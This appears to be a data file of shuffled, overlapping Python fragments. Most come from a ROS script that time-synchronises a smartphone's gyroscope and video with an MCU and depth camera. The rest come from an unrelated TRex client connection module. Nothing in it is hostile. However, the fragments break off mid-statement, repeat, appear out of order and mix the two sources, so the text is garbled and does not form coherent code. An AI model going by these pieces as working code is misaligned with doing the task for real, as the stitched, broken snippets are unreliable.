"mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone",
"np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement # Get data",
"sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y',",
"print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list",
"from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition",
"+ bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD",
"CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu",
"sys import select import os HOST = None # The smartphone's IP address",
"print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator",
"remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global",
"comp_delay2) # Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time,",
"if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in",
"\\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data,",
"plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback)",
"sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\")",
"'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2'",
"provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] #",
"time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _,",
"sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns /",
"'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = []",
"sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths",
"if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq",
"print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference()",
"instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler def",
"mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed",
"CameraInfo, TimeReference import numpy as np import pandas as pd from io import",
"== 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg",
"Show the problem of the first measurement # Get data from s10 imu",
"= rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is",
"publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait()",
"= 4 end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering",
"= None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs",
"if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler)",
"its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts",
"input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1.",
"executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration +",
"sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 =",
"TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data",
"np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2.",
"time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister()",
"gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0)",
"global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if",
"time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration =",
"= pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' :",
"= '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE:",
"RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu,",
"mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data",
"signal import sys import select import os HOST = None # The smartphone's",
"Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value =",
"sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print",
"== 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12:",
"- mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show",
"+ bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = []",
"try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control",
"axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\",",
"mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs",
"camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) #",
"remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection",
"if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) #",
"= np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement # Get",
") ''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) )",
"# Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS",
"sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from mcu imu",
"from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time",
"1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts =",
"import pandas as pd from io import StringIO from src.TimeSync import TimeSync2 import",
"(path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess",
"cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a",
"subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame",
"''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path)",
"'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20'",
"exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1",
"import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys",
"subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to",
"+ str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess)",
"print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string):",
"dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp",
"\"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\"",
"\" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data",
"input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value",
"input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id =",
"'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1]",
"print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01);",
"np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) #",
"io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import",
"None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote",
"= sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data,",
"'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10'",
"= sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts -",
"= '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string):",
"print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time',",
"IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m'",
"OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC",
"time needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp",
"= pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1),",
"recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts =",
"sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp =",
"avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as",
"), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame =",
"#debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client",
"print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") +",
"addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement",
"sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print",
"+ ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging",
"= mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current",
"None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat =",
"Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns =",
"with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\",
"= subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to",
"time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close()",
"#debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts'",
"1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST",
"not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone",
"Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 # Wait to",
"= subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess",
"has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration",
"= [p.wait() for p in running_subpr_list] if remote is not None: try: remote.stop_video()",
"global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or",
"= '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD =",
"data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with",
"/ 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts",
"+ str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister()",
"not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote",
"(value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref",
"depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts =",
"sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset",
"rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess =",
"time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2",
"#print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0]",
"sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] +",
"publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current",
"0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration)",
"False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait()",
"import select import os HOST = None # The smartphone's IP address class",
"Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if",
"depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on s10",
"pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote",
"p in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close()",
"sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z',",
"12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args):"
] |
[
"server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided",
"that connection to the server connection state object describes the connection to the",
"''' return self.async.barrier() def sync (self): ''' fully sync the client with the",
"api_sync_v2 is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return",
"main thread to reconnect ''' # avoid any messages handling for the async",
"3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger",
"provided by the server self.api_h = None def get_server (self): return self.server def",
"port=5050, virtual=False, client = None): self.server = server self.port = port self.rpc_link =",
"virtual=False, client = None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server,",
"server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc #",
"connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT",
"self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED,",
"self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self):",
"async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the",
"marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3",
"self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will",
"rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if",
"''' # first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc",
"self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init",
"''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): '''",
"server must be called after all the config was done ''' return self.async.barrier(baseline",
"the flag is on, a SIGINT will be sent to the main thread",
"valid and will require the main thread to reconnect ''' # avoid any",
"self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h",
"def connect (self): ''' connect to the server (two channels) ''' # first",
"return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the server",
"channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to",
"if not rc: # api_sync_v2 is not present in v2.30 and older if",
"rc = self.rpc.connect() if not rc: return rc # API sync V2 rc",
"from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher",
"and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions')",
"API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level",
"return self.state[1] ########## private ################ def __connect (self): ''' connect to the server",
"# API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not",
"is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT",
"client and server versions') return rc # get the API_H and provide it",
"and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] ==",
"signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT",
"self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by",
"{'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc =",
"API_H and provide it to the RPC channel from now on self.rpc.api_h =",
"rc: self.disconnect() return rc def barrier (self): ''' executes a barrier when it",
"== self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return",
"any thread can mark the current connection as not valid and will require",
"= server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler",
"(self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return",
"disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__",
"self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info =",
"finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the server",
"= self.rpc.connect() if not rc: return rc # API sync V2 rc =",
"and server versions') return rc # get the API_H and provide it to",
"the server must be called after all the config was done ''' return",
"sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if",
"= 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self, batch_list, retry",
"''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3)",
"rc = self.__connect() if not rc: self.disconnect() return rc def barrier (self): '''",
"an async barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully",
"reconnect ''' # avoid any messages handling for the async thread self.async.set_as_zombie() #",
"get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None",
"fully sync the client with the server must be called after all the",
"multithread safe call any thread can mark the current connection as not valid",
"V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2",
"disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def",
"the last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time()",
"be sent to the main thread # causing the ZMQ RPC to stop",
"to reconnect ''' # avoid any messages handling for the async thread self.async.set_as_zombie()",
"''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False",
"''' # avoid any messages handling for the async thread self.async.set_as_zombie() # change",
"with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc =",
"class CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\",",
"disconnect (self): ''' disconnect from both channels sync and async ''' try: self.rpc.disconnect()",
"seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <=",
"= conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver =",
"enabled, if connection is lost a SIGINT will be sent to the main",
"__connect (self): ''' connect to the server (two channels) ''' # start with",
"between client and server versions') return rc # get the API_H and provide",
"can mark the current connection as not valid and will require the main",
"os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the",
"the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is not",
"rc: # api_sync_v2 is not present in v2.30 and older if rc.errno() ==",
"require the main thread to reconnect ''' # avoid any messages handling for",
"= True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection",
"self.port, client) # API handler provided by the server self.api_h = None def",
"############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity",
"the client with the server must be called after all the config was",
"get_server (self): return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect()",
"to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return",
"not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params =",
"return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def",
"rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is",
"{0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API sync",
"be called after all the config was done ''' return self.async.barrier(baseline = True)",
"or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT =",
"the server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to",
"connection to the server connection state object describes the connection to the server",
"(two channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect() #",
"in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and",
"not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between",
"SIGINT will be sent to the main thread # causing the ZMQ RPC",
"sent to the main thread # causing the ZMQ RPC to stop what",
"channels sync and async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None)",
"a barrier when it retruns, an async barrier is guaranteed ''' return self.async.barrier()",
"the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if",
"connection as not valid and will require the main thread to reconnect '''",
"''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case",
"after all the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect",
"barrier when it retruns, an async barrier is guaranteed ''' return self.async.barrier() def",
"state can be either fully disconnected, fully connected or marked for disconnection '''",
"batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry) class",
"True) def mark_for_disconnect (self, cause): ''' A multithread safe call any thread can",
"sync the client with the server must be called after all the config",
"of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return True",
"barrier (self): ''' executes a barrier when it retruns, an async barrier is",
"pointers self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect",
"'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client)",
"rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return rc #",
"the sync channel self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect()",
"# connect rc = self.__connect() if not rc: self.disconnect() return rc def barrier",
"return rc # get the API_H and provide it to the RPC channel",
"connect rc = self.__connect() if not rc: self.disconnect() return rc def barrier (self):",
"rc def barrier (self): ''' executes a barrier when it retruns, an async",
"(self): ''' executes a barrier when it retruns, an async barrier is guaranteed",
"self.state[1] ########## private ################ def __connect (self): ''' connect to the server (two",
"############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the stateless",
"self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost",
"''' Manages that connection to the server connection state object describes the connection",
"= JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h =",
